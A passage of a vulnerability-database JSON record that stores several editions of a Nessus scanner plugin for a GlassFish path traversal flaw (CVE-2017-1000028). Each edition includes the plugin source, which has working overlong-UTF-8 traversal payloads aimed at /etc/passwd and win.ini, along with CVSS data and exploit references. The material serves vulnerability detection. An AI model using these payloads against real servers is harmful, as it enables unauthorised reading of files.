and '/'\n# @param [depth:int] depth of payloads needed \n#\n# @return list of urls that we have to test\n##\nfunction gather_pieces(files, paths, payloads, depth)\n{\n var file, path, payl;\n var urls_list = make_list();\n\n if (empty_or_null(files) || empty_or_null(paths) || \n empty_or_null(payloads) || empty_or_null(depth))\n audit(AUDIT_FN_FAIL, 'gather_pieces');\n\n if (depth < 2)\n audit(AUDIT_FN_FAIL, 'gather_pieces');\n\n foreach file (files)\n foreach path (paths)\n foreach payl (payloads)\n urls_list[max_index(urls_list)] =\n prepare_payload(file:file, path:path, payl:payl, depth:depth);\n\n return urls_list;\n}\n\n#\n# Main\n#\n\n# Check GlassFish & GlassFish Admin Console\nget_kb_item_or_exit('www/glassfish');\nget_kb_item_or_exit('www/glassfish/console');\n\nvar port = get_glassfish_console_port(default:4848);\n\n# Parameters section\nvar depth = 10;\nvar files, paths, res, url;\nvar vuln, req, file;\nvar payloads = [{'.':'%c0%ae', '/':'%c0%af'},\n {'.':'%e0%80%ae', '/':'%c0%af'},\n {'.':'.', '/':'%e0%80%af'},\n {'.':'%f0%80%80%ae', '/':'%e0%80%af'}\n];\nvar file_pats = {\"/etc/passwd\":\"root:.*:0:[01]:\",\n \"/winnt/win.ini\":\"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\",\n \"/windows/win.ini\":\"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\"\n};\nvar os = get_kb_item('Host/OS');\n\n# Exploitation check\nif (!empty_or_null(os) && (report_paranoia < 2))\n{\n if (\"Windows\" >< os)\n {\n files = ['/windows/win.ini', '/winnt/win.ini'];\n paths = ['META-INF', 'com/sun', 'META-INF/test'];\n }\n else\n {\n files = ['/etc/passwd'];\n paths = ['META-INF'];\n }\n}\nelse\n{\n files = ['/etc/passwd', '/windows/win.ini', '/winnt/win.ini'];\n paths = ['META-INF', 'com/sun', 'META-INF/test'];\n}\n\nforeach url (gather_pieces(files:files, paths:paths, payloads:payloads, depth:depth))\n{\n res = get_glassfish_res(url:url, port:port);\n\n foreach file (files)\n if (egrep(pattern:file_pats[file], string:res[2]))\n {\n security_report_v4(\n port : port,\n severity 
: SECURITY_WARNING,\n extra : 'The following HTTP request was sent:\\n\\n' +\n build_glassfish_url(url:url, port:port) + '\\n\\n' +\n 'The contents of file obtained:\\n\\n' + chomp(res[2])\n );\n exit(0);\n }\n}\n\naudit(AUDIT_LISTEN_NOT_VULN, \"GlassFish Server\", port);\nexit(0);\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:oracle:glassfish_server"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-07-02T00:39:56", "differentElements": ["cvss2", "cvss3"], "edition": 4}, {"bulletin": {"id": "GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL", "hash": "c71c6088763043c19049922488d52ec856ed82986fe23110bcb650d2cd1c6c5d", "type": "nessus", "bulletinFamily": "scanner", "title": "Oracle GlassFish Server Path Traversal", "description": "The instance of Oracle GlassFish Server running on the remote host is\naffected by an authenticated and unauthenticated path traversal vulnerability. 
\nRemote attacker can exploit this issue, via a specially crafted HTTP request, \nto access arbitrary files on the remote host.", "published": "2018-05-30T00:00:00", "modified": "2021-07-02T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "href": "https://www.tenable.com/plugins/nessus/110192", "reporter": "This script is Copyright (C) 2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["http://www.nessus.org/u?159578ad"], "cvelist": ["CVE-2017-1000028"], "immutableFields": [], "lastseen": "2021-07-29T00:36:41", "history": [], "viewCount": 142, "enchantments": {"dependencies": {"modified": "2021-07-29T00:36:41", "references": [{"idList": ["UB:CVE-2017-1000028"], "type": "ubuntucve"}, {"idList": ["EDB-ID:45198", "EDB-ID:45196"], "type": "exploitdb"}, {"idList": ["PACKETSTORM:148892"], "type": "packetstorm"}, {"idList": ["CVE-2017-1000028"], "type": "cve"}, {"idList": ["OPENVAS:1361412562310806848"], "type": "openvas"}, {"idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"], "type": "metasploit"}], "rev": 2}, "score": {"modified": "2021-07-29T00:36:41", "rev": 2, "value": 5.7, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "110192", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110192);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/06/14 12:21:47\");\n\n script_cve_id(\"CVE-2017-1000028\");\n script_xref(name:\"EDB-ID\", value:\"39441\");\n\n script_name(english:\"Oracle GlassFish Server Path Traversal\");\n script_summary(english:\"Attempts to access arbitrary files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web application server is affected by a path traversal vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The instance of Oracle GlassFish Server running on the remote host is\naffected by an authenticated and unauthenticated path traversal vulnerability. 
\nRemote attacker can exploit this issue, via a specially crafted HTTP request, \nto access arbitrary files on the remote host.\");\n # https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904\n script_set_attribute(attribute:\"see_also\",value:\"http://www.nessus.org/u?159578ad\");\n script_set_attribute(attribute:\"solution\", value:\n\"Contact to vendor for patch options.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:U/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/30\");\n\n script_set_attribute(attribute:\"plugin_type\",value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:glassfish_server\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"glassfish_console_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"www/glassfish\", \"www/glassfish/console\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"glassfish.inc\");\n\n##\n# Combine payload string for exploitation of issue\n#\n# @param [file:string] target file to read from server\n# @param [path:string] piece of URL that triggers vulnerable Java component\n# @param [payl:array] contains encoding pattern for '.' and '/'\n# @param [depth:int] depth of payloads needed\n#\n# @return string payload to send to the server\n##\nfunction prepare_payload(file, path, payl, depth)\n{\n var i, piece, pieces_of_file;\n var url = '/theme/';\n\n if (empty_or_null(file) || empty_or_null(path) || \n empty_or_null(payl) || empty_or_null(depth))\n audit(AUDIT_FN_FAIL, 'prepare_payload');\n\n if (depth < 2)\n audit(AUDIT_FN_FAIL, 'prepare_payload');\n\n url += path;\n\n # Generate enough encoded /.. sequences \n for (i=0; i<depth; i++)\n url += payl['/'] + payl['.'] + payl['.'];\n\n # Encode / in file name\n pieces_of_file = split(file, sep:'/', keep:false);\n\n for (i=1; i<len(pieces_of_file); i++)\n url += payl['/'] + pieces_of_file[i];\n\n return url;\n}\n\n##\n# Select pieces from input parameters to generate payload\n#\n# @param [files:string] target file to read from server\n# @param [paths:string] piece of URL that triggers vulnerable Java component\n# @param [payloads:array] contains encoding pattern for '.' 
and '/'\n# @param [depth:int] depth of payloads needed \n#\n# @return list of urls that we have to test\n##\nfunction gather_pieces(files, paths, payloads, depth)\n{\n var file, path, payl;\n var urls_list = make_list();\n\n if (empty_or_null(files) || empty_or_null(paths) || \n empty_or_null(payloads) || empty_or_null(depth))\n audit(AUDIT_FN_FAIL, 'gather_pieces');\n\n if (depth < 2)\n audit(AUDIT_FN_FAIL, 'gather_pieces');\n\n foreach file (files)\n foreach path (paths)\n foreach payl (payloads)\n urls_list[max_index(urls_list)] =\n prepare_payload(file:file, path:path, payl:payl, depth:depth);\n\n return urls_list;\n}\n\n#\n# Main\n#\n\n# Check GlassFish & GlassFish Admin Console\nget_kb_item_or_exit('www/glassfish');\nget_kb_item_or_exit('www/glassfish/console');\n\nvar port = get_glassfish_console_port(default:4848);\n\n# Parameters section\nvar depth = 10;\nvar files, paths, res, url;\nvar vuln, req, file;\nvar payloads = [{'.':'%c0%ae', '/':'%c0%af'},\n {'.':'%e0%80%ae', '/':'%c0%af'},\n {'.':'.', '/':'%e0%80%af'},\n {'.':'%f0%80%80%ae', '/':'%e0%80%af'}\n];\nvar file_pats = {\"/etc/passwd\":\"root:.*:0:[01]:\",\n \"/winnt/win.ini\":\"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\",\n \"/windows/win.ini\":\"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\"\n};\nvar os = get_kb_item('Host/OS');\n\n# Exploitation check\nif (!empty_or_null(os) && (report_paranoia < 2))\n{\n if (\"Windows\" >< os)\n {\n files = ['/windows/win.ini', '/winnt/win.ini'];\n paths = ['META-INF', 'com/sun', 'META-INF/test'];\n }\n else\n {\n files = ['/etc/passwd'];\n paths = ['META-INF'];\n }\n}\nelse\n{\n files = ['/etc/passwd', '/windows/win.ini', '/winnt/win.ini'];\n paths = ['META-INF', 'com/sun', 'META-INF/test'];\n}\n\nforeach url (gather_pieces(files:files, paths:paths, payloads:payloads, depth:depth))\n{\n res = get_glassfish_res(url:url, port:port);\n\n foreach file (files)\n if (egrep(pattern:file_pats[file], string:res[2]))\n {\n security_report_v4(\n port : port,\n severity 
: SECURITY_WARNING,\n extra : 'The following HTTP request was sent:\\n\\n' +\n build_glassfish_url(url:url, port:port) + '\\n\\n' +\n 'The contents of file obtained:\\n\\n' + chomp(res[2])\n );\n exit(0);\n }\n}\n\naudit(AUDIT_LISTEN_NOT_VULN, \"GlassFish Server\", port);\nexit(0);\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:oracle:glassfish_server"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-07-29T00:36:41", "differentElements": ["modified"], "edition": 5}, {"bulletin": {"id": "GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL", "hash": "4237e6efc63527c2f59dfefc56e8221d", "type": "nessus", "bulletinFamily": "scanner", "title": "Oracle GlassFish Server Path Traversal", "description": "The instance of Oracle GlassFish Server running on the remote host is\naffected by an authenticated and unauthenticated path traversal vulnerability. 
\nRemote attacker can exploit this issue, via a specially crafted HTTP request, \nto access arbitrary files on the remote host.", "published": "2018-05-30T00:00:00", "modified": "2021-08-02T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "href": "https://www.tenable.com/plugins/nessus/110192", "reporter": "This script is Copyright (C) 2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["http://www.nessus.org/u?159578ad"], "cvelist": ["CVE-2017-1000028"], "immutableFields": [], "lastseen": "2021-08-01T08:45:20", "history": [], "viewCount": 142, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-1000028"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-1000028"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148892"]}, {"type": "exploitdb", "idList": ["EDB-ID:45196", "EDB-ID:45198"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310806848"]}], "modified": "2021-08-01T08:45:20", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-08-01T08:45:20", "rev": 2}}, "objectVersion": "1.6", "pluginID": "110192", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110192);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/06/14 12:21:47\");\n\n script_cve_id(\"CVE-2017-1000028\");\n script_xref(name:\"EDB-ID\", value:\"39441\");\n\n script_name(english:\"Oracle GlassFish Server Path Traversal\");\n script_summary(english:\"Attempts to access arbitrary files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web application server is affected by a path traversal vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The instance of Oracle GlassFish Server running on the remote host is\naffected by an authenticated and unauthenticated path traversal vulnerability. 
\nRemote attacker can exploit this issue, via a specially crafted HTTP request, \nto access arbitrary files on the remote host.\");\n # https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904\n script_set_attribute(attribute:\"see_also\",value:\"http://www.nessus.org/u?159578ad\");\n script_set_attribute(attribute:\"solution\", value:\n\"Contact to vendor for patch options.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:U/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/30\");\n\n script_set_attribute(attribute:\"plugin_type\",value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:glassfish_server\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"glassfish_console_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"www/glassfish\", \"www/glassfish/console\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"glassfish.inc\");\n\n##\n# Combine payload string for exploitation of issue\n#\n# @param [file:string] target file to read from server\n# @param [path:string] piece of URL that triggers vulnerable Java component\n# @param [payl:array] contains encoding pattern for '.' and '/'\n# @param [depth:int] depth of payloads needed\n#\n# @return string payload to send to the server\n##\nfunction prepare_payload(file, path, payl, depth)\n{\n var i, piece, pieces_of_file;\n var url = '/theme/';\n\n if (empty_or_null(file) || empty_or_null(path) || \n empty_or_null(payl) || empty_or_null(depth))\n audit(AUDIT_FN_FAIL, 'prepare_payload');\n\n if (depth < 2)\n audit(AUDIT_FN_FAIL, 'prepare_payload');\n\n url += path;\n\n # Generate enough encoded /.. sequences \n for (i=0; i<depth; i++)\n url += payl['/'] + payl['.'] + payl['.'];\n\n # Encode / in file name\n pieces_of_file = split(file, sep:'/', keep:false);\n\n for (i=1; i<len(pieces_of_file); i++)\n url += payl['/'] + pieces_of_file[i];\n\n return url;\n}\n\n##\n# Select pieces from input parameters to generate payload\n#\n# @param [files:string] target file to read from server\n# @param [paths:string] piece of URL that triggers vulnerable Java component\n# @param [payloads:array] contains encoding pattern for '.' 
and '/'\n# @param [depth:int] depth of payloads needed \n#\n# @return list of urls that we have to test\n##\nfunction gather_pieces(files, paths, payloads, depth)\n{\n var file, path, payl;\n var urls_list = make_list();\n\n if (empty_or_null(files) || empty_or_null(paths) || \n empty_or_null(payloads) || empty_or_null(depth))\n audit(AUDIT_FN_FAIL, 'gather_pieces');\n\n if (depth < 2)\n audit(AUDIT_FN_FAIL, 'gather_pieces');\n\n foreach file (files)\n foreach path (paths)\n foreach payl (payloads)\n urls_list[max_index(urls_list)] =\n prepare_payload(file:file, path:path, payl:payl, depth:depth);\n\n return urls_list;\n}\n\n#\n# Main\n#\n\n# Check GlassFish & GlassFish Admin Console\nget_kb_item_or_exit('www/glassfish');\nget_kb_item_or_exit('www/glassfish/console');\n\nvar port = get_glassfish_console_port(default:4848);\n\n# Parameters section\nvar depth = 10;\nvar files, paths, res, url;\nvar vuln, req, file;\nvar payloads = [{'.':'%c0%ae', '/':'%c0%af'},\n {'.':'%e0%80%ae', '/':'%c0%af'},\n {'.':'.', '/':'%e0%80%af'},\n {'.':'%f0%80%80%ae', '/':'%e0%80%af'}\n];\nvar file_pats = {\"/etc/passwd\":\"root:.*:0:[01]:\",\n \"/winnt/win.ini\":\"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\",\n \"/windows/win.ini\":\"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\"\n};\nvar os = get_kb_item('Host/OS');\n\n# Exploitation check\nif (!empty_or_null(os) && (report_paranoia < 2))\n{\n if (\"Windows\" >< os)\n {\n files = ['/windows/win.ini', '/winnt/win.ini'];\n paths = ['META-INF', 'com/sun', 'META-INF/test'];\n }\n else\n {\n files = ['/etc/passwd'];\n paths = ['META-INF'];\n }\n}\nelse\n{\n files = ['/etc/passwd', '/windows/win.ini', '/winnt/win.ini'];\n paths = ['META-INF', 'com/sun', 'META-INF/test'];\n}\n\nforeach url (gather_pieces(files:files, paths:paths, payloads:payloads, depth:depth))\n{\n res = get_glassfish_res(url:url, port:port);\n\n foreach file (files)\n if (egrep(pattern:file_pats[file], string:res[2]))\n {\n security_report_v4(\n port : port,\n severity 
: SECURITY_WARNING,\n extra : 'The following HTTP request was sent:\\n\\n' +\n build_glassfish_url(url:url, port:port) + '\\n\\n' +\n 'The contents of file obtained:\\n\\n' + chomp(res[2])\n );\n exit(0);\n }\n}\n\naudit(AUDIT_LISTEN_NOT_VULN, \"GlassFish Server\", port);\nexit(0);\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:oracle:glassfish_server"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-08-01T08:45:20", "differentElements": ["cvss2", "cvss3", "description", "exploitAvailable", "exploitEase", "modified", "references", "solution", "vpr", "vulnerabilityPublicationDate"], "edition": 6}, {"bulletin": {"id": "GLASSFISH4_REMOTE_FILE_DISCLOSURE.NASL", "hash": "63fca850c8dac8aa333a38b964277682", "type": "nessus", "bulletinFamily": "scanner", "title": "Oracle GlassFish Server Path Traversal", "description": "The instance of Oracle GlassFish Server running on the remote host is affected by an authenticated and unauthenticated path traversal vulnerability. Remote attacker can exploit this issue, via a specially crafted HTTP request, to access arbitrary files on the remote host.", "published": "2018-05-30T00:00:00", "modified": "2018-06-14T00:00:00", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {}, "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "href": "https://www.tenable.com/plugins/nessus/110192", "reporter": "This script is Copyright (C) 2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000028", "http://www.nessus.org/u?159578ad"], "cvelist": ["CVE-2017-1000028"], "immutableFields": [], "lastseen": "2021-08-11T13:52:10", "history": [], "viewCount": 142, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-1000028"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-1000028"]}, {"type": "exploitdb", "idList": ["EDB-ID:45196", "EDB-ID:45198"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148892"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310806848"]}], "modified": "2021-08-11T13:52:10", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-08-11T13:52:10", "rev": 2}}, "objectVersion": "1.6", "pluginID": "110192", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110192);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/06/14 12:21:47\");\n\n script_cve_id(\"CVE-2017-1000028\");\n script_xref(name:\"EDB-ID\", value:\"39441\");\n\n script_name(english:\"Oracle GlassFish Server Path Traversal\");\n script_summary(english:\"Attempts to access arbitrary files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web application server is affected by a path traversal vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The instance of Oracle GlassFish Server running on the remote host is\naffected by an authenticated and unauthenticated path traversal vulnerability. 
\nRemote attacker can exploit this issue, via a specially crafted HTTP request, \nto access arbitrary files on the remote host.\");\n # https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904\n script_set_attribute(attribute:\"see_also\",value:\"http://www.nessus.org/u?159578ad\");\n script_set_attribute(attribute:\"solution\", value:\n\"Contact to vendor for patch options.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:U/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/30\");\n\n script_set_attribute(attribute:\"plugin_type\",value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:glassfish_server\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"glassfish_console_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"www/glassfish\", \"www/glassfish/console\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"glassfish.inc\");\n\n##\n# Combine payload string for exploitation of issue\n#\n# @param [file:string] target file to read from server\n# @param [path:string] piece of URL that triggers vulnerable Java component\n# @param [payl:array] contains encoding pattern for '.' and '/'\n# @param [depth:int] depth of payloads needed\n#\n# @return string payload to send to the server\n##\nfunction prepare_payload(file, path, payl, depth)\n{\n var i, piece, pieces_of_file;\n var url = '/theme/';\n\n if (empty_or_null(file) || empty_or_null(path) || \n empty_or_null(payl) || empty_or_null(depth))\n audit(AUDIT_FN_FAIL, 'prepare_payload');\n\n if (depth < 2)\n audit(AUDIT_FN_FAIL, 'prepare_payload');\n\n url += path;\n\n # Generate enough encoded /.. sequences \n for (i=0; i<depth; i++)\n url += payl['/'] + payl['.'] + payl['.'];\n\n # Encode / in file name\n pieces_of_file = split(file, sep:'/', keep:false);\n\n for (i=1; i<len(pieces_of_file); i++)\n url += payl['/'] + pieces_of_file[i];\n\n return url;\n}\n\n##\n# Select pieces from input parameters to generate payload\n#\n# @param [files:string] target file to read from server\n# @param [paths:string] piece of URL that triggers vulnerable Java component\n# @param [payloads:array] contains encoding pattern for '.' 
and '/'\n# @param [depth:int] depth of payloads needed \n#\n# @return list of urls that we have to test\n##\nfunction gather_pieces(files, paths, payloads, depth)\n{\n var file, path, payl;\n var urls_list = make_list();\n\n if (empty_or_null(files) || empty_or_null(paths) || \n empty_or_null(payloads) || empty_or_null(depth))\n audit(AUDIT_FN_FAIL, 'gather_pieces');\n\n if (depth < 2)\n audit(AUDIT_FN_FAIL, 'gather_pieces');\n\n foreach file (files)\n foreach path (paths)\n foreach payl (payloads)\n urls_list[max_index(urls_list)] =\n prepare_payload(file:file, path:path, payl:payl, depth:depth);\n\n return urls_list;\n}\n\n#\n# Main\n#\n\n# Check GlassFish & GlassFish Admin Console\nget_kb_item_or_exit('www/glassfish');\nget_kb_item_or_exit('www/glassfish/console');\n\nvar port = get_glassfish_console_port(default:4848);\n\n# Parameters section\nvar depth = 10;\nvar files, paths, res, url;\nvar vuln, req, file;\nvar payloads = [{'.':'%c0%ae', '/':'%c0%af'},\n {'.':'%e0%80%ae', '/':'%c0%af'},\n {'.':'.', '/':'%e0%80%af'},\n {'.':'%f0%80%80%ae', '/':'%e0%80%af'}\n];\nvar file_pats = {\"/etc/passwd\":\"root:.*:0:[01]:\",\n \"/winnt/win.ini\":\"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\",\n \"/windows/win.ini\":\"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\"\n};\nvar os = get_kb_item('Host/OS');\n\n# Exploitation check\nif (!empty_or_null(os) && (report_paranoia < 2))\n{\n if (\"Windows\" >< os)\n {\n files = ['/windows/win.ini', '/winnt/win.ini'];\n paths = ['META-INF', 'com/sun', 'META-INF/test'];\n }\n else\n {\n files = ['/etc/passwd'];\n paths = ['META-INF'];\n }\n}\nelse\n{\n files = ['/etc/passwd', '/windows/win.ini', '/winnt/win.ini'];\n paths = ['META-INF', 'com/sun', 'META-INF/test'];\n}\n\nforeach url (gather_pieces(files:files, paths:paths, payloads:payloads, depth:depth))\n{\n res = get_glassfish_res(url:url, port:port);\n\n foreach file (files)\n if (egrep(pattern:file_pats[file], string:res[2]))\n {\n security_report_v4(\n port : port,\n severity 
: SECURITY_WARNING,\n extra : 'The following HTTP request was sent:\\n\\n' +\n build_glassfish_url(url:url, port:port) + '\\n\\n' +\n 'The contents of file obtained:\\n\\n' + chomp(res[2])\n );\n exit(0);\n }\n}\n\naudit(AUDIT_LISTEN_NOT_VULN, \"GlassFish Server\", port);\nexit(0);\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:oracle:glassfish_server"], "solution": "Contact to vendor for patch options.", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {"risk factor": "Medium", "score": "4.4"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": null, "vulnerabilityPublicationDate": "2017-07-17T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-11T13:52:10", "differentElements": ["nessusSeverity"], "edition": 7}], "viewCount": 148, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-1000028"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-1000028"]}, {"type": "exploitdb", "idList": ["EDB-ID:45198", "EDB-ID:45196"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148892"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310806848"]}], "modified": "2021-08-19T12:32:04", "rev": 2}, "score": {"value": 5.7, "vector": 